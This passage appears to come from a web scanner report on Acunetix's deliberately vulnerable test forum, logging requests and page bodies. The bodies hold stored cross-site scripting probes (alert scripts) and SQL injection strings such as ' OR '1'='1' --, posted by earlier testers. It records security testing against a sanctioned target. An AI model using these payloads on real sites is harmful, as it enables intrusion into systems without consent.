<b> </b> on 3/13/2022 3:12:55 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:08 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>111 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:31 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:41 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1<script>alert('Hello')</script> - 180.74.64.218</div><div class='posttext'>1232</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=10 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4130 |
| Response Body - size: 4,130 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=11 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=12 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4135 |
| Response Body - size: 4,135 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=13 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=14 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4140 |
| Response Body - size: 4,140 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=15 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=16 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4140 |
| Response Body - size: 4,140 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a 